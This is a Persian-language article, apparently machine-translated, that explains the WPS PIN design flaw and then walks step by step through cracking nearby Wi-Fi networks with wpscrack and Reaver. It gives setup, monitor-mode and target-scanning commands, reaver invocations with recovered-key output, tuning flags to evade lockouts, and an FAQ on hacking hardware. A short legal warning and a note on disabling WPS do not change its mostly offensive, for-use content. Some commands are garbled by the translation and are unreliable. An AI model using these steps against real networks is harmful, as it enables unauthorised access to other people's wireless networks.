معمولاً عملکرد WPS دارای یک نشانگر نور است که به شما امکان می دهد بفهمید که در حال حاضر با دستگاه شما چه اتفاقی می افتد. خود دکمه WPS ممکن است یک نشانگر نور داشته باشد. یا (این در درجه اول برای روترهای بدون دکمه اعمال می شود) نشانگر روی پانل جلویی قرار می گیرد.

نشانگر WPS زمانی که روتر به شبکه متصل است روشن می شود و پس از چند ثانیه خاموش می شود. اگر هیچ اتصال فعالی وجود نداشته باشد، WPS روی روتر خاموش است.

وقتی دکمه را فشار می دهید، نشانگر به آرامی شروع به چشمک زدن می کند.. این بدان معنی است که ارتباط برقرار است.

اگر نشانگر حالت WPS روی روتر باشد به سرعت چشمک می زند، این بدان معنی است که یک اتصال خراب شده استیا مهلت به پایان رسیده است.

اگر نشانگر ثابت روشن، یعنی اتصال با موفقیت برقرار شدو پایدار کار می کند.

ممکن است با فشار دادن دکمه، نشانگر روشن شود و خاموش شود یا اصلا روشن نشود. به احتمال زیاد، شما عملکرد WPS را غیرفعال کرده اید. به رابط وب دستگاه خود بروید و آن را در تنظیمات شبکه بی سیم فعال کنید.

مزیت و ایمنی

مزیت اصلی WPS سهولت استفاده از آن است.. در واقع این فناوری برای چه اختراع شد.

برای استفاده از شبکه بی سیم، نیازی به پیکربندی آن در رابط وب روتر ندارید - نام، رمز عبور را تنظیم کنید، رمز عبور را به خاطر بسپارید و هر بار که دستگاه جدیدی را متصل می کنید، آن را وارد کنید. WPS به طور خودکار یک نام شبکه و یک کلید امنیتی اختصاص می دهد و هر بار آنها را دوباره تولید می کند. دستگاه برای اتصال به روتر نیازی به دانستن این پارامترها ندارد.

اتصال با فشار دادن یک دکمه انجام می شود. هنگامی که دستگاه اجازه اتصال از طریق WPS را درخواست کرد، عملکرد روتر را فعال کنید و چند ثانیه یا چند دقیقه صبر کنید. همه چیز بدون مشارکت شما اتفاق خواهد افتاد.

فناوری WPS اتصال پایدار و سرعت بالاتر را فراهم می کند. حداقل این چیزی است که توسعه دهندگان می گویند.

با این حال، دو نکته اول فقط برای روترهایی با عملکرد اتصال سخت افزاری مرتبط است. اگر دکمه WPS در دستگاه شما وجود ندارد، باز هم باید به رابط وب بروید و تنظیمات را در آنجا ایجاد کنید و یک کد پین را در دستگاه های مشتری وارد کنید.

در مورد سرعت انتقال داده، در عمل، WPS بهتر از Wi-Fi معمولی نیست. به طور دقیق، این Wi-Fi است، فقط یک روش ساده برای اتصال آن استفاده می شود.

اگرچه این فناوری برای مدت طولانی وجود داشته است، اما هنوز واقعاً آزمایش نشده است. مشکلات زمانی شروع می‌شوند که می‌خواهید دستگاهی را به روتر متصل کنید که پشتیبانی از WPS داخلی ندارد. اما سوال برانگیزترین مسئله امنیت اتصال WPS است.

اتصال کد پین توسط بسیاری از دستگاه ها و در همان زمان پشتیبانی می شود نسبت به سایر روش های مجوز کاربر آسیب پذیرتر است. کد فقط از هشت رقم تشکیل شده و تعداد ترکیبات محدودی دارد. با استفاده از روش انتخاب می توان آن را هک کرد. بنابراین، اتصال WPS را نمی توان ایمن تلقی کرد و توصیه می شود برای محافظت از شبکه در برابر هک، از روش های مجوز معتبرتری استفاده کنید.

چندی پیش، به نظر می رسید که یک شبکه بی سیم محافظت شده با استفاده از فناوری WPA2 کاملاً ایمن است. انتخاب یک کلید ساده برای اتصال واقعا امکان پذیر است. اما اگر یک کلید واقعا طولانی تنظیم کنید، نه جداول رنگین کمان و نه حتی شتاب پردازنده گرافیکی به اتصال آن کمک نمی کند. اما، همانطور که مشخص شد، می توانید بدون آن به یک شبکه بی سیم متصل شوید - با استفاده از یک آسیب پذیری اخیراً کشف شده در پروتکل WPS.

هشدار

تمام اطلاعات فقط برای اهداف آموزشی ارائه شده است. نفوذ به شبکه بی سیم شخص دیگری به راحتی می تواند به عنوان یک جرم جنایی در نظر گرفته شود. با سرت فکر کن

قیمت ساده سازی ها

نقاط دسترسی باز کمتر و کمتری وجود دارد که اصلاً نیازی به وارد کردن کلید برای اتصال به آنها ندارید. به نظر می رسد که به زودی می توان آنها را در کتاب قرمز فهرست کرد. اگر قبلاً ممکن بود شخصی حتی نداند که یک شبکه بی سیم را می توان با یک کلید بسته و از خود در برابر اتصالات خارجی محافظت می کرد ، اکنون به طور فزاینده ای در مورد این امکان به او گفته می شود. حداقل سفت‌افزار سفارشی منتشر شده توسط ارائه‌دهندگان پیشرو برای مدل‌های روتر محبوب را برای ساده‌سازی راه‌اندازی استفاده کنید. شما باید دو چیز را مشخص کنید - لاگین / رمز عبور و ... یک کلید برای محافظت از شبکه بی سیم. مهمتر از آن، خود تولیدکنندگان سخت افزار تلاش می کنند تا فرآیند راه اندازی را ساده کنند. بنابراین، اکثر روترهای مدرن از مکانیسم WPS (Wi-Fi Protected Setup) پشتیبانی می کنند. با کمک آن، کاربر می‌تواند در عرض چند ثانیه یک شبکه بی‌سیم امن راه‌اندازی کند، بدون اینکه اصلاً با این واقعیت که «در جای دیگری باید رمزگذاری را فعال کنید و یک کلید WPA را ثبت کنید» را خسته کنید. یک پین کاراکتری هشت رقمی را در سیستم وارد کردید که روی روتر نوشته شده است - و کار شما تمام شد! و در اینجا، محکم نگه دارید. در ماه دسامبر، دو محقق بلافاصله در مورد نقص های اساسی جدی در پروتکل WPS صحبت کردند. این مانند یک درب پشتی برای هر روتر است. معلوم شد که اگر WPS در اکسس پوینت فعال باشد (که برای یک لحظه در اکثر روترها به طور پیش فرض فعال است)، می توانید یک پین برای اتصال بردارید و در عرض چند ساعت یک کلید برای اتصال استخراج کنید!

WPS چگونه کار می کند؟

ایده سازندگان WPS خوب است. مکانیزم به طور خودکار نام شبکه و رمزگذاری را تنظیم می کند. بنابراین، کاربر نیازی به رفتن به رابط وب و پرداختن به تنظیمات پیچیده ندارد. و می توانید به راحتی هر دستگاهی (به عنوان مثال، لپ تاپ) را به یک شبکه از قبل پیکربندی شده اضافه کنید: اگر پین را به درستی وارد کنید، تمام تنظیمات لازم را دریافت می کند. این بسیار راحت است، به همین دلیل است که همه بازیگران اصلی بازار (Cisco / Linksys، Netgear، D-Link، Belkin، Buffalo، ZyXEL) اکنون روترهای بی سیم دارای WPS را ارائه می دهند. بیایید کمی بیشتر بفهمیم.

سه گزینه برای استفاده از WPS وجود دارد:

1. اتصال دکمه فشاری (PBC). کاربر یک دکمه مخصوص روی روتر (سخت افزار) و کامپیوتر (نرم افزار) را فشار می دهد و در نتیجه فرآیند پیکربندی را فعال می کند. ما علاقه ای نداریم.
2. وارد کردن کد پین در رابط وب. کاربر از طریق مرورگر وارد رابط اداری روتر می شود و پین کد هشت رقمی نوشته شده روی کیس دستگاه را وارد می کند (شکل 1) و پس از آن فرآیند پیکربندی انجام می شود. این روش بیشتر برای پیکربندی اولیه روتر مناسب است، بنابراین ما آن را نیز در نظر نخواهیم گرفت.
3. وارد کردن کد پین در رایانه کاربر (شکل 2). هنگام اتصال به روتر، می‌توانید یک جلسه WPS ویژه باز کنید، که در آن می‌توانید روتر را پیکربندی کنید یا اگر کد پین را به درستی وارد کنید، تنظیمات موجود را دریافت کنید. حالا این جذاب است. برای باز کردن چنین جلسه ای نیازی به احراز هویت نیست. هر کسی می تواند این کار را انجام دهد! به نظر می رسد که کد پین در حال حاضر به طور بالقوه مستعد حمله bruteforce است. اما اینها فقط گل هستند.

آسیب پذیری

همانطور که قبلاً اشاره کردم، پین شامل هشت رقم است - از این رو 10^8 (100,000,000) انتخاب برای انتخاب وجود دارد. با این حال، تعداد گزینه ها را می توان به طور قابل توجهی کاهش داد. واقعیت این است که آخرین رقم کد پین نوعی چک جمع است که بر اساس هفت رقم اول محاسبه می شود. در نتیجه، ما در حال حاضر 10 ^ 7 (10,000,000) گزینه دریافت می کنیم. اما این همه ماجرا نیست! در مرحله بعد، ما به دقت به دستگاه پروتکل احراز هویت WPS نگاه می کنیم (شکل 3). به نظر می رسد که به طور ویژه طراحی شده است تا امکان استفاده از نیروی بی رحم را فراهم کند. به نظر می رسد که بررسی PIN-کد در دو مرحله انجام می شود. به دو قسمت مساوی تقسیم می شود و هر قسمت جداگانه بررسی می شود! بیایید به نمودار نگاه کنیم:

1. اگر پس از ارسال پیام M4، مهاجم در پاسخ یک EAP-NACK دریافت کرد، می‌تواند مطمئن باشد که قسمت اول کد پین نادرست است.
2. اگر او پس از ارسال M6 یک EAP-NACK دریافت کرد، بر این اساس، قسمت دوم کد پین نادرست است. ما 10^4 (10000) گزینه برای نیمه اول و 10^3 (1000) برای نیمه دوم دریافت می کنیم. در نتیجه، ما فقط 11000 گزینه برای یک شمارش کامل داریم. برای درک بهتر این که چگونه این کار می کند، به نمودار نگاه کنید.
3. نکته مهم سرعت احتمالی شمارش است. سرعت پردازش درخواست‌های WPS توسط روتر محدود می‌شود: برخی از نقاط دسترسی هر ثانیه یک نتیجه را صادر می‌کنند، برخی دیگر هر ده ثانیه یک نتیجه را صادر می‌کنند. بیشتر زمان صرف محاسبه کلید عمومی با استفاده از الگوریتم Diffie-Hellman می شود، باید قبل از مرحله M3 تولید شود. زمان صرف شده برای این کار را می توان با انتخاب یک کلید مخفی ساده در سمت کلاینت کاهش داد، که محاسبه سایر کلیدها را آسان تر می کند. تمرین نشان می‌دهد که برای یک نتیجه موفقیت‌آمیز، معمولاً فقط نیمی از گزینه‌ها را مرتب کنید، و به طور متوسط، نیروی بی‌رحم تنها چهار تا ده ساعت طول می‌کشد.

اجرای اول

اولین پیاده سازی brute-force که ظاهر شد، ابزار wpscrack (goo.gl/9wABj) بود که توسط محقق Stefan Fiböck در پایتون نوشته شد. این ابزار از کتابخانه Scapy استفاده می کند که به شما امکان می دهد بسته های شبکه دلخواه را تزریق کنید. این اسکریپت فقط می تواند تحت سیستم لینوکس اجرا شود، پس از تغییر رابط بی سیم به حالت نظارت. به عنوان پارامتر، باید نام رابط شبکه در سیستم، آدرس MAC آداپتور بی سیم و همچنین آدرس MAC نقطه دسترسی و نام آن (SSID) را مشخص کنید.

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer شروع به تلاش کرد 00000000 تلاش انجام شد 0.95 ثانیه تلاش 00010009<...>تلاش 18660005 تلاش 1.08 ثانیه طول کشید تلاش 18670004# یافت شد نیمه اول تلاش پین 1.09 ثانیه طول کشید تلاش 18670011 تلاش 1.08 ثانیه طول کشید<...>تلاش 18674095# نیمه دوم پین پیدا شد<...>کلید شبکه: 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_pass phras 0020 65 5F 67 6F 6F 64 6F 5_36 e Good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

همانطور که می بینید ابتدا نیمه اول پین کد انتخاب شد و سپس دومی و در نهایت برنامه کلید آماده برای اتصال به شبکه بی سیم را صادر کرد. تصور اینکه چقدر طول می کشد تا یک کلید به این طول (61 کاراکتر) را با ابزارهای از قبل موجود حدس بزنید. با این حال، wpscrack تنها ابزاری نیست که از این آسیب‌پذیری بهره‌برداری می‌کند، و این یک لحظه خنده‌دار است: در همان زمان، محقق دیگری به نام کریگ هفنر از Tactical Network Solutions روی همین مشکل کار می‌کرد. او با مشاهده اینکه یک PoC فعال در وب برای اجرای حمله ظاهر شد، ابزار Reaver خود را منتشر کرد. این نه تنها فرآیند brute-force WPS-PIN را خودکار می‌کند و کلید PSK را استخراج می‌کند، بلکه تنظیمات بیشتری را ارائه می‌دهد تا بتوان حمله را علیه طیف گسترده‌ای از روترها انجام داد. علاوه بر این، تعداد بسیار بیشتری از آداپتورهای بی سیم را پشتیبانی می کند. ما تصمیم گرفتیم آن را به عنوان مبنایی در نظر بگیریم و به طور مفصل توضیح دهیم که چگونه یک مهاجم می تواند از آسیب پذیری در پروتکل WPS برای اتصال به یک شبکه بی سیم امن استفاده کند.

چگونه

مانند هر حمله دیگری به شبکه بی سیم، ما به لینوکس نیاز خواهیم داشت. در اینجا باید بگویم که Reaver در مخزن توزیع شناخته شده BackTrack وجود دارد که درایورهای لازم برای دستگاه های بی سیم را نیز شامل می شود. بنابراین از آن استفاده خواهیم کرد.

مرحله 0. سیستم را آماده کنید

در وب سایت رسمی، BackTrack 5 R1 برای دانلود به عنوان یک ماشین مجازی تحت VMware و یک تصویر ISO قابل بوت در دسترس است. من گزینه آخر را پیشنهاد می کنم. می توانید به سادگی تصویر را روی یک دیسک رایت کنید یا می توانید از این برنامه برای ایجاد یک درایو فلش USB قابل بوت استفاده کنید: به هر حال، با بوت شدن از چنین رسانه ای، بلافاصله یک سیستم آماده برای کار بدون دردسرهای غیر ضروری خواهیم داشت.

دوره آموزشی خرابی هک وای فای

1. WEP (Wired Equivalent Privacy) اولین فناوری ایمن سازی شبکه بی سیم بسیار ضعیف بود. با استفاده از نقاط ضعف رمز RC4 استفاده شده در آن، تنها در چند دقیقه می توان آن را هک کرد. ابزار اصلی در اینجا sniffer airodump-ng برای جمع آوری بسته ها و ابزار aircrack-ng است که مستقیماً برای شکستن کلید استفاده می شود. یک ابزار ویژه wesside-ng نیز وجود دارد که به طور کلی تمام نقاط اطراف را با WEP در حالت خودکار هک می کند.
2. WPA/WPA2 (دسترسی محافظت شده بی سیم)

Brute force تنها راه یافتن کلید برای یک شبکه بسته WPA / WPA2 است (و حتی در آن صورت فقط در صورتی که تخلیه به اصطلاح WPA Handshake وجود داشته باشد که هنگام اتصال مشتری به نقطه دسترسی پخش می شود).

نیروی بی رحم می تواند روزها، ماه ها و سال ها ادامه داشته باشد. برای افزایش کارایی شمارش، ابتدا از دیکشنری های تخصصی استفاده شد، سپس جداول رنگین کمانی تولید شد و بعداً ابزارهایی ظاهر شدند که از فناوری های NVIDIA CUDA و ATI Stream برای تسریع سخت افزاری فرآیند به دلیل GPU استفاده می کردند. ابزارهای مورد استفاده عبارتند از aircrack-ng (دیکشنری brute force)، cowpatty (با استفاده از جداول رنگین کمان)، pyrit (با استفاده از کارت گرافیک).

مرحله 1. وارد شوید

لاگین و رمز عبور پیش فرض root:toor است. پس از ورود به کنسول، می‌توانید با خیال راحت «x» را شروع کنید (بیلدهای BackTrack جداگانه وجود دارد - هم با GNOME و هم با KDE):

#startx

مرحله 2 Reaver را نصب کنید

برای دانلود ریور به اینترنت نیاز داریم. بنابراین، ما یک سیم پچ را وصل می کنیم یا یک آداپتور بی سیم را پیکربندی می کنیم (منوی "برنامه ها> اینترنت> مدیر شبکه Wicd"). در مرحله بعد، شبیه ساز ترمینال را راه اندازی می کنیم، جایی که آخرین نسخه ابزار را از طریق مخزن دانلود می کنیم:

# آپدیت apt-get # apt-get install reaver

در اینجا باید بگویم که مخزن دارای نسخه 1.3 است که شخصاً برای من اشتباه کار کرده است. در جستجوی اطلاعات مربوط به مشکل، پستی از نویسنده پیدا کردم که توصیه می‌کند با جمع‌آوری منابع برگرفته از SVN، به‌روزرسانی به بالاترین نسخه ممکن را انجام دهید. این، به طور کلی، همه کاره ترین روش نصب (برای هر توزیع) است.

$ svn تسویه حساب http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # را نصب کنید

هیچ مشکلی در مونتاژ تحت BackTrack وجود نخواهد داشت - من شخصا آن را بررسی کردم. در توزیع Arch Linux که من استفاده می کنم، به لطف PKGBUILD مناسب، نصب حتی ساده تر است:

$ yaourt -S reaver-wps-svn

مرحله 3. آماده شدن برای نیروی بی رحم

برای استفاده از Reaver باید موارد زیر را انجام دهید:

• آداپتور بی سیم را در حالت نظارت قرار دهید.
• نام رابط بی سیم را بیابید.
• آدرس MAC نقطه دسترسی (BSSID) را پیدا کنید.
• مطمئن شوید که WPS در نقطه فعال است.

ابتدا، بیایید بررسی کنیم که رابط بی سیم اصلاً در سیستم وجود دارد:

# iwconfig

اگر خروجی این دستور دارای یک رابط با توضیحات (معمولا wlan0) باشد، سیستم آداپتور را شناسایی کرد (اگر برای دانلود Reaver به یک شبکه بی سیم وصل شده بود، بهتر است اتصال را قطع کنید). بیایید آداپتور را در حالت نظارت قرار دهیم:

# airmon-ng شروع wlan0

این دستور یک رابط مجازی در حالت مانیتورینگ ایجاد می کند، نام آن در خروجی دستور (معمولا mon0) نشان داده می شود. اکنون باید نقطه دسترسی برای حمله را پیدا کنیم و BSSID آن را پیدا کنیم. بیایید از ابزار برای گوش دادن به پخش بی سیم airodump-ng استفاده کنیم:

# airodump-ng mon0

لیستی از نقاط دسترسی در دسترس روی صفحه ظاهر می شود. ما به نقاطی با رمزگذاری WPA / WPA2 و احراز هویت کلید PSK علاقه مند هستیم.

بهتر است یکی از اولین ها را در لیست انتخاب کنید، زیرا ارتباط خوب با نقطه برای حمله مطلوب است. اگر نقاط زیادی وجود دارد و لیست روی صفحه قرار نمی گیرد، می توانید از ابزار شناخته شده دیگری استفاده کنید - kismet، که در آن رابط از این نظر سازگارتر است. به صورت اختیاری، می توانید در محل بررسی کنید که آیا مکانیسم WPS در نقطه ما فعال است یا خیر. برای انجام این کار، Reaver را کامل کنید (اما فقط اگر آن را از SVN بگیرید) ابزار شستشو ارائه می شود:

# ./wash -i mon0

پارامتر نام رابطی را مشخص می کند که به حالت نظارت تغییر کرده است. همچنین می‌توانید از گزینه «-f» استفاده کنید و یک فایل cap ایجاد شده، به عنوان مثال، توسط همان airodump-ng به ابزار کمک کنید. به دلایلی نامعلوم، BackTrack ابزار شستشو را در بسته Reaver قرار نداد. امیدوارم تا زمان انتشار مقاله، این خطا اصلاح شود.

مرحله 4. بروت فورس را اجرا کنید

اکنون می توانید مستقیماً به شمارش پین بروید. برای راه اندازی Reaver در ساده ترین حالت، به کمی نیاز دارید. شما فقط باید نام اینترفیس (که قبلاً به حالت نظارت تغییر کرده بودیم) و BSSID نقطه دسترسی را مشخص کنید:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

سوئیچ "-vv" خروجی توسعه یافته برنامه را روشن می کند تا مطمئن شویم همه چیز همانطور که باید کار می کند.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] در انتظار فانوس دریایی از 00:21:29:74:67:50 [+] مرتبط با 00:21:29:74:67:50 (ESSID: linksys) [+] تلاش پین 63979978

اگر برنامه به طور مداوم پین ها را به نقطه دسترسی می فرستد، پس همه چیز به خوبی شروع شد و انتظار احمقانه باقی می ماند. این روند ممکن است مدت زیادی طول بکشد. کمترین زمانی که توانستم پین را به زور وارد کنم حدود پنج ساعت بود. به محض انتخاب، برنامه با کمال میل این را اعلام خواهد کرد:

[+] پین آزمایشی 64637129 [+] کلید در 13654 ثانیه شکسته شد [+] پین WPS: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

با ارزش ترین چیز در اینجا، البته، کلید WPA-PSK است که می تواند بلافاصله برای اتصال استفاده شود. همه چیز آنقدر ساده است که حتی در سر هم جا نمی شود.

آیا امکان دفاع وجود دارد؟

تا اینجای کار، می توانید از یک راه از خود در برابر حمله محافظت کنید - WPS را در تنظیمات روتر خاموش کنید. درست است، همانطور که معلوم شد، این همیشه امکان پذیر نیست. از آنجایی که این آسیب‌پذیری در سطح پیاده‌سازی وجود ندارد، اما در سطح پروتکل وجود ندارد، ارزش آن را ندارد که منتظر یک وصله اولیه از سوی تولیدکنندگان باشیم که همه مشکلات را حل کند. بیشترین کاری که اکنون می توانند انجام دهند این است که تا آنجا که ممکن است در برابر زور وحشیانه مقاومت کنند. به عنوان مثال، اگر بعد از پنج بار تلاش ناموفق برای وارد کردن کد پین، WPS را به مدت یک ساعت مسدود کنید، جستجو حدود 90 روز طول خواهد کشید. اما سوال دیگر این است که با چه سرعتی می‌توان چنین وصله‌ای را در میلیون‌ها دستگاهی که در سراسر جهان کار می‌کنند منتشر کرد؟

ارتقاء Reaver

در HOWTO، ما ساده ترین و همه کاره ترین راه را برای استفاده از ابزار Reaver نشان داده ایم. با این حال، پیاده سازی WPS از سازنده ای به سازنده دیگر متفاوت است، بنابراین برخی از تنظیمات اضافی در برخی موارد مورد نیاز است. در زیر گزینه های اضافی را ارائه خواهم کرد که می تواند سرعت و کارایی شمارش کلید را افزایش دهد.

1. می توانید شماره کانال و SSID نقطه دسترسی را تنظیم کنید: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. گزینه '-dh-small' تأثیر مفیدی بر سرعت brute-force دارد، که مقدار کمی از کلید مخفی را تعیین می کند، بنابراین محاسبات را در سمت نقطه دسترسی تسهیل می کند: # reaver -i mon0 -b 00:01:02 :03:04:05 -vv - -dh-small
3. زمان پاسخگویی پیش فرض پنج ثانیه است. در صورت نیاز می توانید آن را تغییر دهید: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
4. تاخیر پیش‌فرض بین تلاش‌های مجدد یک ثانیه است. همچنین می توان آن را پیکربندی کرد: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
5. برخی از اکسس پوینت ها می توانند WPS را برای مدت معینی مسدود کنند، مشکوک به اینکه در حال تلاش برای فک کردن هستند. Reaver متوجه این وضعیت می شود و به طور پیش فرض تکرار را برای 315 ثانیه متوقف می کند، مدت زمان این مکث را می توان تغییر داد: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
6. برخی از پیاده‌سازی‌های پروتکل WPS در صورت نادرست بودن پین، اتصال را قطع می‌کنند، اگرچه مشخصات مستلزم آن است که یک پیام خاص برگردانند. Reaver به طور خودکار این وضعیت را تشخیص می دهد، برای این گزینه "--nack" وجود دارد: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. گزینه "--eap-terminate" برای آن دسته از APهایی است که نیاز دارند جلسه WPS با یک پیام EAP FAIL به پایان برسد: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
8. وقوع خطا در جلسه WPS ممکن است به این معنی باشد که AP تعداد تلاش‌ها برای وارد کردن کد پین را محدود می‌کند یا به سادگی با درخواست‌ها بارگیری می‌کند. این اطلاعات روی صفحه نمایش داده می شود. در این مورد، Reaver فعالیت خود را متوقف می کند و زمان مکث را می توان با استفاده از گزینه '--fail-wait' تنظیم کرد: # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

سوالات متداول

سوال: چه آداپتور بی سیم برای هک مورد نیاز است؟

پاسخ: قبل از آزمایش، باید مطمئن شوید که آداپتور بی سیم می تواند در حالت مانیتور کار کند. بهترین راه این است که لیست سخت افزار پشتیبانی شده را در سایت پروژه Aircrack-ng بررسی کنید. اگر این سوال پیش می آید که کدام ماژول بی سیم را بخرید، می توانید با هر آداپتور مبتنی بر چیپست RTL8187L شروع کنید. دانگل های USB را به راحتی می توان آنلاین با قیمت 20 دلار پیدا کرد.

س: چرا خطاهای "تایم اوت" و "خارج از نظم" را دریافت می کنم؟

پاسخ: این معمولاً به دلیل قدرت سیگنال پایین و ارتباط ضعیف با نقطه دسترسی است. علاوه بر این، نقطه دسترسی ممکن است به طور موقت استفاده از WPS را مسدود کند.

س: چرا جعل آدرس MAC برای من کار نمی کند؟

پاسخ: ممکن است MAC رابط مجازی mon0 را جعل کنید و این کار نمی کند. شما باید نام رابط واقعی را مشخص کنید، به عنوان مثال wlan0.

سوال: چرا وقتی سیگنال بد است ریور ضعیف کار می کند، اگرچه همان کرک WEP خوب کار می کند؟

پاسخ: به طور معمول، کرک WEP با ارسال مجدد بسته های ضبط شده به منظور به دست آوردن بردارهای اولیه (IVs) بیشتر مورد نیاز برای کرک موفق اتفاق می افتد. در این مورد، مهم نیست که بسته ای در طول مسیر گم شده یا به نوعی خراب شده است. اما برای حمله به WPS، لازم است به شدت از پروتکل انتقال بسته بین نقطه دسترسی و Reaver برای بررسی هر کد پین پیروی کنید. و اگر در همان زمان برخی از بسته ها گم شد یا به شکل نامناسبی در آمد، باید جلسه WPS را دوباره برقرار کنید. این باعث می شود که حملات WPS بسیار بیشتر به قدرت سیگنال وابسته باشند. همچنین مهم است به یاد داشته باشید که اگر آداپتور بی سیم شما نقطه دسترسی را می بیند، این به این معنی نیست که نقطه دسترسی شما را می بیند. بنابراین، اگر صاحب خوشحالی از یک آداپتور پرقدرت از شبکه ALFA و یک آنتن با چند ده dBi هستید، پس امیدوار نباشید که بتوانید تمام نقاط دسترسی دستگیر شده را بشکنید.

سوال: ریور همیشه یک پین را به نقطه دسترسی می فرستد، چه مشکلی دارد؟

پاسخ: بررسی کنید که آیا WPS در روتر فعال است یا خیر. این را می توان با ابزار شستشو انجام داد: آن را اجرا کنید و بررسی کنید که هدف شما در لیست است.

س: چرا نمی توانم با یک نقطه دسترسی ارتباط برقرار کنم؟

پاسخ: این ممکن است به دلیل قدرت سیگنال ضعیف باشد یا به این دلیل که آداپتور شما برای چنین بررسی‌هایی مناسب نیست.

سوال: چرا به خطاهای "تشخیص محدود نرخ" ادامه می دهم؟پاسخ: این به این دلیل است که نقطه دسترسی WPS را مسدود کرده است. معمولاً این یک انسداد موقت است (حدود پنج دقیقه)، اما در برخی موارد می توان یک ممنوعیت دائمی نیز ایجاد کرد (رفع انسداد فقط از طریق پانل اداری). یک اشکال بد در Reaver نسخه 1.3 وجود دارد که به دلیل آن حذف چنین قفل هایی شناسایی نمی شود. به عنوان یک راه حل، پیشنهاد می شود از گزینه «--ignore-locks» استفاده کنید یا آخرین نسخه را از SVN دانلود کنید.

سوال: آیا امکان اجرای همزمان دو یا چند نمونه از Reaver برای افزایش سرعت حمله وجود دارد؟

پاسخ: از نظر تئوری، این امکان وجود دارد، اما اگر آنها همان نقطه دسترسی را از بین ببرند، بعید است که سرعت شمارش افزایش یابد، زیرا در این مورد به دلیل سخت افزار ضعیف نقطه دسترسی، که در حال حاضر به طور کامل با یک نقطه بارگذاری شده است، محدود می شود. حمله کننده.